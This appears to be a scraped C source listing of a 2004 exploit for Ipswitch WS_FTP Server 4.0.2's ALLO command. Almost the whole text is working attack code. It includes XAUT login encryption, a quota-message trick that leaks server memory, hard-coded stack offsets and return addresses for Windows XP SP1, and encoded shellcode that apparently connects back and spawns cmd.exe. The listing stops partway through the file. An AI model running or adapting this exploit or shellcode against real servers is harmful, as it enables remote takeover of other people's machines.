1206 lines
No EOL
24 KiB
C
1206 lines
No EOL
24 KiB
C
/*
|
|
* Ipswitch WS_FTP Server <= 4.0.2 ALLO exploit
|
|
* (c)2004 Hugh Mann hughmann@hotmail.com
|
|
*
|
|
* This exploit has been tested with WS_FTP Server 4.0.2.EVAL, Windows XP SP1
|
|
*
|
|
* NOTE:
|
|
* - The exploit assumes the user has a total file size limit. If the user only has
|
|
* a max number of files limit you will need to rewrite parts of this exploit for
|
|
* it to work.
|
|
*/
|
|
|
|
#include <winsock2.h>
|
|
#pragma comment(lib, "ws2_32.lib")
|
|
#include <windows.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
|
|
const char* temp_file = "#t#t#t";
|
|
#define ALLO_STRING "ALLO 18446744073709551615"
|
|
|
|
/*
|
|
* Assume all addresses >= this address to be invalid addresses. If the exploit doesn't work,
|
|
* try changing it to a larger value, eg. 0x80000000 or 0xC0000000.
|
|
*/
|
|
const MAX_ADDR = 0x80000000;
|
|
|
|
/*
|
|
* Size of each thread's stack space. From iFtpSvc.exe PE header. Must be a power of 2.
|
|
* Should not be necessary to change this since practically all PE files use the default
|
|
* size (1MB).
|
|
*/
|
|
const SERV_STK_SIZE = 0x00100000;
|
|
|
|
/*
|
|
* This is the lower bits of ESP when the ALLO handler is called. This is very WS_FTP Server
|
|
* version dependent. Should be = ESP (mod SERV_STK_SIZE)
|
|
*/
|
|
const SERV_STK_OFFS = 0x0007F208;
|
|
|
|
/*
|
|
* This is the offset of the "this" pointer relative to SERV_STK_OFFS in the ALLO handler.
|
|
*/
|
|
const SERV_STK_THIS_OFFS = -(0x210+4); // EBP is saved
|
|
|
|
/*
|
|
* Offset of username relative to the "this" pointer
|
|
*/
|
|
const SERV_THIS_USERNAME_OFFS = 0x9F8;
|
|
|
|
/*
|
|
* Offset of FTP cmd buf relative to the "this" pointer
|
|
*/
|
|
const SERV_THIS_CMDBUF_OFFS = 0x1F8;
|
|
|
|
/*
|
|
* Offset of EIP relative to vulnerable buffer
|
|
*/
|
|
const SERV_BUF_EIP = 0x110;
|
|
|
|
/*
|
|
* Return addresses to JMP ESP instruction. Must contain bytes that are valid shellcode characters.
|
|
*/
|
|
#if 1
|
|
const char* ret_addr = "\xD3\xD9\xE2\x77"; // advapi32.dll (08/29/2002), WinXP SP1
|
|
#else
|
|
// mswsock.dll is not loaded by WS_FTP Server, and I haven't investigated which DLL actually loads it
|
|
// so I don't use this possibly better return address.
|
|
const char* ret_addr = "\x3D\x40\xA5\x71"; // mswsock.dll (08/23/2001), WinXP SP1 and probably WinXP too
|
|
#endif
|
|
|
|
#define MAXLINE 0x1000
|
|
|
|
static char inbuf[MAXLINE];
|
|
static unsigned inoffs = 0;
|
|
static char last_line[MAXLINE];
|
|
static int output_all = 0;
|
|
static int quite_you = 0;
|
|
|
|
void msg2(const char *format, ...)
|
|
{
|
|
va_list args;
|
|
va_start(args, format);
|
|
vfprintf(stdout, format, args);
|
|
}
|
|
|
|
void msg(const char *format, ...)
|
|
{
|
|
if (quite_you && output_all == 0)
|
|
return;
|
|
|
|
va_list args;
|
|
va_start(args, format);
|
|
vfprintf(stdout, format, args);
|
|
}
|
|
|
|
int isrd(SOCKET s)
|
|
{
|
|
fd_set r;
|
|
FD_ZERO(&r);
|
|
FD_SET(s, &r);
|
|
timeval t = {0, 0};
|
|
int ret = select(1, &r, NULL, NULL, &t);
|
|
if (ret < 0)
|
|
return 0;
|
|
else
|
|
return ret != 0;
|
|
}
|
|
|
|
void print_all(const char* buf, int len = -1)
|
|
{
|
|
if (len == -1)
|
|
len = (int)strlen(buf);
|
|
|
|
for (int i = 0; i < len; i++)
|
|
putc(buf[i], stdout);
|
|
}
|
|
|
|
int _recv(SOCKET s, char* buf, int len, int flags)
|
|
{
|
|
int ret = recv(s, buf, len, flags);
|
|
if (!output_all || ret < 0)
|
|
return ret;
|
|
|
|
print_all(buf, ret);
|
|
return ret;
|
|
}
|
|
|
|
int get_line(SOCKET s, char* string, unsigned len)
|
|
{
|
|
char* nl;
|
|
while ((nl = (char*)memchr(inbuf, '\n', inoffs)) == NULL)
|
|
{
|
|
if (inoffs >= sizeof(inbuf))
|
|
{
|
|
msg("[-] Too long line\n");
|
|
return 0;
|
|
}
|
|
int len = _recv(s, &inbuf[inoffs], sizeof(inbuf) - inoffs, 0);
|
|
if (len <= 0)
|
|
{
|
|
msg("[-] Error receiving data\n");
|
|
return 0;
|
|
}
|
|
|
|
inoffs += len;
|
|
}
|
|
|
|
strncpy(last_line, inbuf, sizeof(last_line));
|
|
last_line[sizeof(last_line)-1] = 0;
|
|
|
|
unsigned nlidx = (unsigned)(ULONG_PTR)(nl - inbuf);
|
|
if (nlidx >= len)
|
|
{
|
|
msg("[-] Too small caller buffer\n");
|
|
return 0;
|
|
}
|
|
memcpy(string, inbuf, nlidx);
|
|
string[nlidx] = 0;
|
|
if (nlidx > 0 && string[nlidx-1] == '\r')
|
|
string[nlidx-1] = 0;
|
|
|
|
if (nlidx + 1 >= inoffs)
|
|
inoffs = 0;
|
|
else
|
|
{
|
|
memcpy(inbuf, &inbuf[nlidx+1], inoffs - (nlidx + 1));
|
|
inoffs -= nlidx + 1;
|
|
}
|
|
|
|
return 1;
|
|
}
|
|
|
|
int ignorerd(SOCKET s)
|
|
{
|
|
inoffs = 0;
|
|
|
|
while (1)
|
|
{
|
|
if (!isrd(s))
|
|
return 1;
|
|
if (_recv(s, inbuf, sizeof(inbuf), 0) < 0)
|
|
return 0;
|
|
}
|
|
}
|
|
|
|
int get_reply_code(SOCKET s, int (*func)(void* data, char* line) = NULL, void* data = NULL)
|
|
{
|
|
char line[MAXLINE];
|
|
|
|
if (!get_line(s, line, sizeof(line)))
|
|
{
|
|
msg("[-] Could not get status code\n");
|
|
return -1;
|
|
}
|
|
if (func)
|
|
func(data, line);
|
|
|
|
char c = line[3];
|
|
line[3] = 0;
|
|
int code;
|
|
if (!(c == ' ' || c == '-') || strlen(line) != 3 || !(code = atoi(line)))
|
|
{
|
|
msg("[-] Weird reply\n");
|
|
return -1;
|
|
}
|
|
|
|
char endline[4];
|
|
memcpy(endline, line, 3);
|
|
endline[3] = ' ';
|
|
if (c == '-')
|
|
{
|
|
while (1)
|
|
{
|
|
if (!get_line(s, line, sizeof(line)))
|
|
{
|
|
msg("[-] Could not get next line\n");
|
|
return -1;
|
|
}
|
|
if (func)
|
|
func(data, line);
|
|
if (!memcmp(line, endline, sizeof(endline)))
|
|
break;
|
|
}
|
|
}
|
|
|
|
return code;
|
|
}
|
|
|
|
int sendb(SOCKET s, const char* buf, int len, int flags = 0)
|
|
{
|
|
while (len)
|
|
{
|
|
int l = send(s, buf, len, flags);
|
|
if (l <= 0)
|
|
break;
|
|
len -= l;
|
|
buf += l;
|
|
}
|
|
|
|
return len == 0;
|
|
}
|
|
|
|
int sends(SOCKET s, const char* buf, int flags = 0)
|
|
{
|
|
return sendb(s, buf, (int)strlen(buf), flags);
|
|
}
|
|
|
|
int _send_cmd(SOCKET s, const char* fmt, va_list args, int need_reply)
|
|
{
|
|
char buf[MAXLINE];
|
|
buf[sizeof(buf)-1] = 0;
|
|
if (_vsnprintf(buf, sizeof(buf), fmt, args) < 0 || buf[sizeof(buf)-1] != 0)
|
|
{
|
|
msg("[-] Buffer overflow\n");
|
|
return -1;
|
|
}
|
|
|
|
if (output_all)
|
|
print_all(buf);
|
|
|
|
if (!ignorerd(s) || !sends(s, buf))
|
|
return -1;
|
|
|
|
if (need_reply)
|
|
return get_reply_code(s);
|
|
|
|
return 0;
|
|
}
|
|
|
|
int send_cmd(SOCKET s, const char* fmt, ...)
|
|
{
|
|
va_list args;
|
|
va_start(args, fmt);
|
|
return _send_cmd(s, fmt, args, 1);
|
|
}
|
|
|
|
int send_cmd2(SOCKET s, const char* fmt, ...)
|
|
{
|
|
va_list args;
|
|
va_start(args, fmt);
|
|
return _send_cmd(s, fmt, args, 0);
|
|
}
|
|
|
|
int add_bytes(void* dst, int& dstoffs, int dstlen, const void* src, int srclen)
|
|
{
|
|
if (dstoffs < 0 || dstoffs + srclen > dstlen || dstoffs + srclen < dstoffs)
|
|
{
|
|
msg("[-] Buffer overflow ;)\n");
|
|
return 0;
|
|
}
|
|
|
|
memcpy((char*)dst+dstoffs, src, srclen);
|
|
dstoffs += srclen;
|
|
return 1;
|
|
}
|
|
|
|
int check_invd_bytes(const char* name, const void* buf, int buflen, int (*chkchar)(char c))
|
|
{
|
|
const char* b = (const char*)buf;
|
|
|
|
for (int i = 0; i < buflen; i++)
|
|
{
|
|
if (!chkchar(b[i]))
|
|
{
|
|
msg("[-] %s[%u] (%02X) is an invalid character\n", name, i, (unsigned char)b[i]);
|
|
return 0;
|
|
}
|
|
}
|
|
|
|
return 1;
|
|
}
|
|
|
|
int enc_byte(char& c, char& k, int (*chkchar)(char c))
|
|
{
|
|
for (int i = 0; i < 0x100; i++)
|
|
{
|
|
if (!chkchar(c ^ i) || !chkchar(i))
|
|
continue;
|
|
|
|
c ^= i;
|
|
k = i;
|
|
return 1;
|
|
}
|
|
|
|
msg("[-] Could not find encryption key for byte %02X\n", c);
|
|
return 0;
|
|
}
|
|
|
|
int get_enc_key(char* buf, int size, int offs, int step, int (*chkchar)(char c), int ignore1 = -1, int ignore2 = -1)
|
|
{
|
|
for (int i = 0; i < 0x100; i++)
|
|
{
|
|
if (!chkchar(i))
|
|
continue;
|
|
|
|
for (int j = offs; j < size; j += step)
|
|
{
|
|
if (ignore1 != -1 && (j >= ignore1 && j <= ignore2))
|
|
continue; // These bytes aren't encrypted
|
|
if (!chkchar(buf[j] ^ i))
|
|
break;
|
|
}
|
|
if (j < size)
|
|
continue;
|
|
|
|
return i;
|
|
}
|
|
|
|
msg("[-] Could not find an encryption key\n");
|
|
return -1;
|
|
}
|
|
|
|
int login(SOCKET s, const char* username, const char* userpass)
|
|
{
|
|
msg("[+] Logging in as %s...\n", username);
|
|
int code;
|
|
if ((code = send_cmd(s, "USER %s\r\n", username)) < 0)
|
|
{
|
|
msg("[-] Failed to log in #1\n");
|
|
return 0;
|
|
}
|
|
|
|
if (code == 331)
|
|
{
|
|
if ((code = send_cmd(s, "PASS %s\r\n", userpass)) < 0)
|
|
{
|
|
msg("[-] Failed to log in #2\n");
|
|
return 0;
|
|
}
|
|
}
|
|
|
|
if (code != 230)
|
|
{
|
|
msg("[-] Failed to log in. Code %3u\n", code);
|
|
return 0;
|
|
}
|
|
|
|
msg("[+] Logged in\n");
|
|
return 1;
|
|
}
|
|
|
|
class xuser
|
|
{
|
|
public:
|
|
xuser() : s(INVALID_SOCKET) {}
|
|
~xuser() {close();}
|
|
int init(unsigned long ip, unsigned short port, const char* username, const char* userpass);
|
|
void close() {if (s >= 0) closesocket(s); s = INVALID_SOCKET;}
|
|
SOCKET sock() const {return s;}
|
|
int exploit(unsigned long sip, unsigned short sport);
|
|
int read_serv_mem_bytes(unsigned addr, void* dst, int dstlen);
|
|
int read_serv_mem_string(unsigned addr, char* dst, int dstlen);
|
|
int read_serv_mem_uint32(unsigned addr, unsigned* dst);
|
|
|
|
protected:
|
|
int read_serv_mem(unsigned addr, void* dst, int dstlen);
|
|
|
|
SOCKET s;
|
|
char username[260];
|
|
char userpass[260];
|
|
unsigned long ip;
|
|
unsigned short port;
|
|
};
|
|
|
|
/*
|
|
* XAUT code tested with WS_FTP Server 4.0.2.EVAL
|
|
*/
|
|
#define XAUT_2_KEY 0x49327576
|
|
|
|
int xaut_encrypt(char* dst, const char* src, int len, unsigned long key)
|
|
{
|
|
unsigned char keybuf[0x80*4];
|
|
|
|
for (int i = 0; i < sizeof(keybuf)/4; i++)
|
|
{
|
|
keybuf[i*4+0] = (char)key;
|
|
keybuf[i*4+1] = (char)(key >> 8);
|
|
keybuf[i*4+2] = (char)(key >> 16);
|
|
keybuf[i*4+3] = (char)(key >> 24);
|
|
}
|
|
|
|
for (int i = 0; i < len; i++)
|
|
{
|
|
if (i >= sizeof(keybuf))
|
|
{
|
|
msg("[-] xaut_encrypt: Too long input buffer\n");
|
|
return 0;
|
|
}
|
|
*dst++ = *src++ ^ keybuf[i];
|
|
}
|
|
|
|
return 1;
|
|
}
|
|
|
|
char* xaut_unpack(char* src, int len, int delete_it)
|
|
{
|
|
char* dst = new char[len*2 + 1];
|
|
|
|
for (int i = 0; i < len; i++)
|
|
{
|
|
dst[i*2+0] = ((src[i] >> 4) & 0x0F) + 0x35;
|
|
dst[i*2+1] = (src[i] & 0x0F) + 0x31;
|
|
}
|
|
dst[i*2] = 0;
|
|
|
|
if (delete_it)
|
|
delete src;
|
|
|
|
return dst;
|
|
}
|
|
|
|
int xaut_login(SOCKET s, int d, const char* username, const char* password, unsigned long key)
|
|
{
|
|
msg("[+] Logging in [XAUT] as %s...\n", username);
|
|
int ret = 0;
|
|
char* dst = NULL;
|
|
__try
|
|
{
|
|
const char* middle = ":";
|
|
dst = new char[strlen(username) + strlen(middle) + strlen(password) + 1];
|
|
strcpy(dst, username);
|
|
strcat(dst, middle);
|
|
strcat(dst, password);
|
|
int len = (int)strlen(dst);
|
|
if ((d == 2 && !xaut_encrypt(dst, dst, len, XAUT_2_KEY)) || !xaut_encrypt(dst, dst, len, key))
|
|
__leave;
|
|
|
|
dst = xaut_unpack(dst, len, 1);
|
|
if (send_cmd(s, "XAUT %d %s\r\n", d, dst) != 230)
|
|
__leave;
|
|
|
|
ret = 1;
|
|
}
|
|
__finally
|
|
{
|
|
delete dst;
|
|
}
|
|
|
|
if (!ret)
|
|
msg("[-] Failed to log in\n");
|
|
else
|
|
msg("[+] Logged in\n");
|
|
|
|
return ret;
|
|
}
|
|
|
|
struct my_data
|
|
{
|
|
unsigned long key;
|
|
int done_that;
|
|
char hostname[256];
|
|
};
|
|
|
|
int line_callback(void* data, char* line)
|
|
{
|
|
my_data* m = (my_data*)data;
|
|
if (m->done_that)
|
|
return 1;
|
|
|
|
/*
|
|
* Looking for a line similar to:
|
|
*
|
|
* "220-FTP_HOSTNAME X2 WS_FTP Server 4.0.2.EVAL (41541732)\r\n"
|
|
*/
|
|
char* s, *e;
|
|
if (strncmp(line, "220", 3) || !strstr(line, "WS_FTP Server") ||
|
|
(s = strrchr(line, '(')) == NULL || (e = strchr(s, ')')) == NULL)
|
|
return 1;
|
|
|
|
char buf[0x10];
|
|
int len = (int)(ULONG_PTR)(e - (s+1));
|
|
if (len >= sizeof(buf) || len > 10)
|
|
return 1;
|
|
memcpy(buf, s+1, len);
|
|
buf[len] = 0;
|
|
for (int i = 0; i < len; i++)
|
|
{
|
|
if (!isdigit((unsigned char)buf[i]))
|
|
return 1;
|
|
}
|
|
m->key = atol(buf);
|
|
|
|
for (int i = 4, len = (int)strlen(line); i < len; i++)
|
|
{
|
|
if (i-4 >= sizeof(m->hostname))
|
|
return 1;
|
|
m->hostname[i-4] = line[i];
|
|
if (line[i] == ' ')
|
|
break;
|
|
}
|
|
m->hostname[i-4] = 0;
|
|
if (m->hostname[0] == 0)
|
|
return 1;
|
|
|
|
m->done_that = 1;
|
|
return 1;
|
|
}
|
|
|
|
int xuser::init(unsigned long _ip, unsigned short _port, const char* _username, const char* _userpass)
|
|
{
|
|
ip = _ip;
|
|
port = _port;
|
|
close();
|
|
|
|
strncpy(username, _username, sizeof(username));
|
|
if (username[sizeof(username)-1] != 0)
|
|
{
|
|
msg("[-] username too long\n");
|
|
return 0;
|
|
}
|
|
strncpy(userpass, _userpass, sizeof(userpass));
|
|
if (userpass[sizeof(userpass)-1] != 0)
|
|
{
|
|
msg("[-] userpass too long\n");
|
|
return 0;
|
|
}
|
|
|
|
sockaddr_in saddr;
|
|
memset(&saddr, 0, sizeof(saddr));
|
|
saddr.sin_family = AF_INET;
|
|
saddr.sin_port = htons(port);
|
|
saddr.sin_addr.s_addr = htonl(ip);
|
|
|
|
in_addr a; a.s_addr = htonl(ip);
|
|
msg("[+] Connecting to %s:%u...\n", inet_ntoa(a), port);
|
|
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
if (s < 0 || connect(s, (sockaddr*)&saddr, sizeof(saddr)) < 0)
|
|
{
|
|
msg("[-] Could not connect\n");
|
|
return 0;
|
|
}
|
|
msg("[+] Connected\n");
|
|
|
|
my_data m;
|
|
memset(&m, 0, sizeof(m));
|
|
int code = get_reply_code(s, line_callback, &m);
|
|
if (code != 220)
|
|
{
|
|
msg("[-] Got reply %3u\n", code);
|
|
return 0;
|
|
}
|
|
else if (!m.done_that)
|
|
{
|
|
msg("[-] Could not find XAUT key or host name => Not a WS_FTP Server\n");
|
|
return 0;
|
|
}
|
|
|
|
if (!xaut_login(s, 0, username, userpass, m.key) && !login(s, username, userpass))
|
|
return 0;
|
|
|
|
// Don't want UTF8 conversions
|
|
if (send_cmd(s, "LANG en\r\n") != 200)
|
|
{
|
|
msg("[-] Apparently they don't understand the english language\n");
|
|
return 0;
|
|
}
|
|
|
|
if (send_cmd(s, "NOOP step into the light\r\n") != 200)
|
|
{
|
|
msg("[-] C4n't k1ll 4 z0mbie\n");
|
|
return 0;
|
|
}
|
|
|
|
return 1;
|
|
}
|
|
|
|
SOCKET get_data_sock(SOCKET s, const char* filename, const char* cmd)
|
|
{
|
|
SOCKET sd = INVALID_SOCKET;
|
|
|
|
int error = 1;
|
|
__try
|
|
{
|
|
sockaddr_in saddr;
|
|
int len = sizeof(saddr);
|
|
if (getsockname(s, (sockaddr*)&saddr, &len) < 0 || len != sizeof(saddr) ||
|
|
(sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
|
|
__leave;
|
|
|
|
sockaddr_in daddr;
|
|
memset(&daddr, 0, sizeof(daddr));
|
|
daddr.sin_family = AF_INET;
|
|
daddr.sin_port = 0;
|
|
daddr.sin_addr.s_addr = saddr.sin_addr.s_addr;
|
|
len = sizeof(daddr);
|
|
if (bind(sd, (sockaddr*)&daddr, sizeof(daddr)) < 0 || listen(sd, 1) < 0 ||
|
|
getsockname(sd, (sockaddr*)&daddr, &len) < 0 || len != sizeof(daddr))
|
|
__leave;
|
|
|
|
unsigned long ip = ntohl(daddr.sin_addr.s_addr);
|
|
unsigned short port = ntohs(daddr.sin_port);
|
|
if (send_cmd(s, "PORT %u,%u,%u,%u,%u,%u\r\n",
|
|
(unsigned char)(ip >> 24),
|
|
(unsigned char)(ip >> 16),
|
|
(unsigned char)(ip >> 8),
|
|
(unsigned char)ip,
|
|
(unsigned char)(port >> 8),
|
|
(unsigned char)port) != 200)
|
|
__leave;
|
|
|
|
if (send_cmd2(s, "%s %s\r\n", cmd, filename) < 0)
|
|
__leave;
|
|
|
|
msg("[+] Waiting for server to connect...\n");
|
|
SOCKET sa;
|
|
sockaddr_in aaddr;
|
|
len = sizeof(aaddr);
|
|
if ((sa = accept(sd, (sockaddr*)&aaddr, &len)) < 0)
|
|
__leave;
|
|
closesocket(sd);
|
|
sd = sa;
|
|
|
|
if (get_reply_code(s) != 150)
|
|
__leave;
|
|
|
|
error = 0;
|
|
}
|
|
__finally
|
|
{
|
|
if (error)
|
|
{
|
|
msg("[-] Could not create data connection, %u\n", GetLastError());
|
|
closesocket(sd);
|
|
sd = INVALID_SOCKET;
|
|
}
|
|
else
|
|
msg("[+] Server connected\n");
|
|
}
|
|
|
|
return sd;
|
|
}
|
|
|
|
int create_file(SOCKET s, const char* tmpname, unsigned size = 1)
|
|
{
|
|
int ret = 0;
|
|
|
|
SOCKET sd = INVALID_SOCKET;
|
|
__try
|
|
{
|
|
if (size > 1 && send_cmd(s, "REST %u\r\n", size) != 350)
|
|
__leave;
|
|
if ((sd = get_data_sock(s, tmpname, "STOR")) < 0)
|
|
__leave;
|
|
|
|
ret = 1;
|
|
}
|
|
__finally
|
|
{
|
|
if (sd >= 0)
|
|
closesocket(sd);
|
|
}
|
|
if (ret && get_reply_code(s) != 226)
|
|
ret = 0;
|
|
|
|
return ret;
|
|
}
|
|
|
|
const unsigned int shlc2_offs_encstart = 0x0000002B;
|
|
const unsigned int shlc2_offs_encend = 0x000001B8;
|
|
const unsigned int shlc2_offs_enckey = 0x00000025;
|
|
unsigned char shlc2_code[] =
|
|
"\xEB\x16\x78\x56\x34\x12\x78\x56\x34\x12\x78\x56\x34\x12\x78\x56"
|
|
"\x34\x12\x5B\x53\x83\xEB\x1D\xC3\xE8\xF5\xFF\xFF\xFF\x33\xC9\xB1"
|
|
"\x64\x81\x74\x8B\x27\x55\x55\x55\x55\xE2\xF6\xFC\x8B\x43\x0A\x31"
|
|
"\x43\x02\x8B\x43\x0E\x31\x43\x06\x89\x4B\x0A\x89\x4B\x0E\x64\x8B"
|
|
"\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\xAD\x8B\x68\x08\x8D"
|
|
"\x83\x67\x01\x00\x00\x55\xE8\xB7\x00\x00\x00\x68\x33\x32\x00\x00"
|
|
"\x68\x77\x73\x32\x5F\x54\xFF\xD0\x96\x8D\x83\x74\x01\x00\x00\x56"
|
|
"\xE8\x9D\x00\x00\x00\x81\xEC\x90\x01\x00\x00\x54\x68\x01\x01\x00"
|
|
"\x00\xFF\xD0\x8D\x83\x7F\x01\x00\x00\x56\xE8\x83\x00\x00\x00\x33"
|
|
"\xC9\x51\x51\x51\x6A\x06\x6A\x01\x6A\x02\xFF\xD0\x97\x8D\x83\x8A"
|
|
"\x01\x00\x00\x56\xE8\x69\x00\x00\x00\x33\xC9\x51\x51\x51\x51\x6A"
|
|
"\x10\x8D\x4B\x02\x51\x57\xFF\xD0\xB9\x54\x00\x00\x00\x2B\xE1\x88"
|
|
"\x6C\x0C\xFF\xE2\xFA\xC6\x44\x24\x10\x44\x41\x88\x4C\x24\x3C\x88"
|
|
"\x4C\x24\x3D\x89\x7C\x24\x48\x89\x7C\x24\x4C\x89\x7C\x24\x50\x49"
|
|
"\x8D\x44\x24\x10\x54\x50\x51\x51\x51\x6A\x01\x51\x51\x8D\x83\xA4"
|
|
"\x01\x00\x00\x50\x51\x8D\x83\x95\x01\x00\x00\x55\xE8\x11\x00\x00"
|
|
"\x00\x59\xFF\xD0\x8D\x83\xAC\x01\x00\x00\x55\xE8\x02\x00\x00\x00"
|
|
"\xFF\xD0\x60\x8B\x7C\x24\x24\x8D\x6F\x78\x03\x6F\x3C\x8B\x6D\x00"
|
|
"\x03\xEF\x83\xC9\xFF\x41\x3B\x4D\x18\x72\x0B\x64\x89\x0D\x00\x00"
|
|
"\x00\x00\x8B\xE1\xFF\xE4\x8B\x5D\x20\x03\xDF\x8B\x1C\x8B\x03\xDF"
|
|
"\x8B\x74\x24\x1C\xAC\x38\x03\x75\xDC\x43\x84\xC0\x75\xF6\x8B\x5D"
|
|
"\x24\x03\xDF\x0F\xB7\x0C\x4B\x8B\x5D\x1C\x03\xDF\x8B\x0C\x8B\x03"
|
|
"\xCF\x89\x4C\x24\x1C\x61\xC3\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61"
|
|
"\x72\x79\x41\x00\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x00\x57"
|
|
"\x53\x41\x53\x6F\x63\x6B\x65\x74\x41\x00\x57\x53\x41\x43\x6F\x6E"
|
|
"\x6E\x65\x63\x74\x00\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65"
|
|
"\x73\x73\x41\x00\x63\x6D\x64\x2E\x65\x78\x65\x00\x45\x78\x69\x74"
|
|
"\x50\x72\x6F\x63\x65\x73\x73\x00";
|
|
|
|
int is_valid_shlc2(char c)
|
|
{
|
|
return c != 0;
|
|
}
|
|
|
|
struct tfs_data
|
|
{
|
|
tfs_data() : tot_size(0), line(0), ok(0) {}
|
|
int line;
|
|
unsigned tot_size;
|
|
int ok;
|
|
};
|
|
|
|
int tfs_line_callback(void* data, char* line)
|
|
{
|
|
tfs_data* m = (tfs_data*)data;
|
|
if (++m->line != 1)
|
|
return 1;
|
|
|
|
if (strncmp(line, "250-", 4) ||
|
|
(m->tot_size = atoi(line+4)) == 0)
|
|
return 1;
|
|
|
|
m->ok = 1;
|
|
return 1;
|
|
}
|
|
|
|
int get_user_total_file_size(SOCKET s, unsigned& tot_size)
|
|
{
|
|
int ret = 0;
|
|
SOCKET sd = INVALID_SOCKET;
|
|
__try
|
|
{
|
|
/*
|
|
* Create a $message.txt file
|
|
*/
|
|
if ((sd = get_data_sock(s, "$message.txt", "STOR")) < 0 ||
|
|
send(sd, "%z", 2, 0) != 2)
|
|
__leave;
|
|
closesocket(sd);
|
|
sd = INVALID_SOCKET;
|
|
if (get_reply_code(s) != 226)
|
|
__leave;
|
|
|
|
tfs_data m;
|
|
const DWORD max_wait = 10000;
|
|
for (DWORD tc = GetTickCount(); GetTickCount() - tc < max_wait; )
|
|
{
|
|
if (send_cmd2(s, "CWD .\r\n") < 0)
|
|
__leave;
|
|
m.ok = m.line = 0;
|
|
int code = get_reply_code(s, tfs_line_callback, &m);
|
|
if (code != 500)
|
|
break;
|
|
}
|
|
|
|
if (!m.ok)
|
|
__leave;
|
|
|
|
tot_size = m.tot_size;
|
|
ret = 1;
|
|
}
|
|
__finally
|
|
{
|
|
if (sd >= 0)
|
|
closesocket(sd);
|
|
}
|
|
|
|
if (!ret)
|
|
msg("[-] Failed to get user total file size.\n Are you sure there's a total file size limit for this user?\n");
|
|
|
|
return ret;
|
|
}
|
|
|
|
int delete_file(SOCKET s, const char* filename)
|
|
{
|
|
DWORD tc = GetTickCount();
|
|
const DWORD wait = 10000;
|
|
while (1)
|
|
{
|
|
if (GetTickCount() - tc > wait)
|
|
return 0;
|
|
|
|
if (send_cmd(s, "STAT %s\r\n", filename) != 211)
|
|
return 1;
|
|
if (send_cmd(s, "DELE %s\r\n", filename) < 0)
|
|
return 0;
|
|
}
|
|
}
|
|
|
|
int create_file_for_addr(SOCKET s, unsigned addr)
|
|
{
|
|
int ret = 0;
|
|
__try
|
|
{
|
|
if (addr >= MAX_ADDR)
|
|
{
|
|
msg2("[-] Trying to read an addr (%08X) >= MAX_ADDR (%08X)\n", addr, MAX_ADDR);
|
|
__leave;
|
|
}
|
|
if (!delete_file(s, temp_file))
|
|
msg("[-] Could not delete file\n");
|
|
|
|
unsigned tot_size;
|
|
if (!get_user_total_file_size(s, tot_size))
|
|
__leave;
|
|
|
|
if (addr < tot_size)
|
|
{
|
|
msg2("[-] You must delete some user files to read address %08X\n", addr);
|
|
__leave;
|
|
}
|
|
unsigned size = addr - tot_size;
|
|
if (!create_file(s, temp_file, size))
|
|
__leave;
|
|
|
|
ret = 1;
|
|
}
|
|
__finally
|
|
{
|
|
}
|
|
|
|
return ret;
|
|
}
|
|
|
|
/*
|
|
* Returns < 0 => error
|
|
* Returns = 0 => server thread crashed
|
|
* Returns > 0 => read this many bytes into dst
|
|
*/
|
|
int xuser::read_serv_mem(unsigned addr, void* dst, int dstlen)
|
|
{
|
|
int file_created = 0;
|
|
int ret = -1;
|
|
__try
|
|
{
|
|
if (!create_file_for_addr(s, addr))
|
|
__leave;
|
|
file_created = 1;
|
|
|
|
if (send_cmd2(s, ALLO_STRING "\r\n") < 0)
|
|
__leave;
|
|
|
|
char buf[MAXLINE];
|
|
int bufsz = 0;
|
|
const char* m1 = "452 ";
|
|
int type = 0;
|
|
while (1)
|
|
{
|
|
if (bufsz >= sizeof(buf)-1)
|
|
__leave;
|
|
|
|
int size = _recv(s, &buf[bufsz], sizeof(buf)-1-bufsz, 0);
|
|
if (size < 0)
|
|
__leave;
|
|
if (size == 0)
|
|
{
|
|
if (bufsz == 0)
|
|
ret = 0;
|
|
__leave;
|
|
}
|
|
bufsz += size;
|
|
buf[bufsz] = 0;
|
|
|
|
if (bufsz >= (int)strlen(m1) && memcmp(m1, buf, strlen(m1)))
|
|
__leave; // Wrong reply code
|
|
|
|
const char* s1 = " files\r\n";
|
|
const char* s2 = " size\r\n";
|
|
if (bufsz >= (int)strlen(s1) && !memcmp(s1, &buf[bufsz-strlen(s1)], strlen(s1)))
|
|
{
|
|
type = 0;
|
|
break;
|
|
}
|
|
if (bufsz >= (int)strlen(s2) && !memcmp(s2, &buf[bufsz-strlen(s2)], strlen(s2)))
|
|
{
|
|
type = 1;
|
|
break;
|
|
}
|
|
}
|
|
|
|
const char* s = "quota exceeded; ";
|
|
const char* f1 = " size; ";
|
|
const char* f2 = " size\r\n";
|
|
const char* f3 = " files; ";
|
|
char* b = buf + strlen(m1);
|
|
if (strncmp(b, s, strlen(s)))
|
|
__leave;
|
|
char* ss = NULL, *se = NULL;
|
|
if (type == 0) // "quota exceeded; %s size; %u files\r\n"
|
|
{
|
|
ss = b + strlen(s);
|
|
for (int i = bufsz-(int)strlen(f1); ; i--)
|
|
{
|
|
if (i < 0)
|
|
__leave;
|
|
if (strncmp(f1, &buf[i], strlen(f1)))
|
|
continue; // Not equal to " size; "
|
|
se = &buf[i];
|
|
break;
|
|
}
|
|
}
|
|
else // "quota exceeded; %u files; %s size\r\n"
|
|
{
|
|
ss = strstr(buf, f3);
|
|
if (!ss)
|
|
__leave;
|
|
ss += strlen(f3);
|
|
se = &buf[bufsz-strlen(f2)];
|
|
}
|
|
if (!se || !ss || se < ss)
|
|
{
|
|
msg("[-] Buggy code\n");
|
|
__leave;
|
|
}
|
|
|
|
*se = 0;
|
|
int rd_size = (int)(UINT_PTR)(se - ss) + 1; // One 00h byte
|
|
ret = min((int)dstlen, rd_size);
|
|
memcpy(dst, ss, ret);
|
|
}
|
|
__finally
|
|
{
|
|
}
|
|
|
|
if (ret < 0)
|
|
msg("[-] Could not read server memory\n");
|
|
else if (ret == 0)
|
|
{
|
|
// Server thread crashed
|
|
if (!init(ip, port, username, userpass))
|
|
ret = -1;
|
|
}
|
|
|
|
return ret;
|
|
}
|
|
|
|
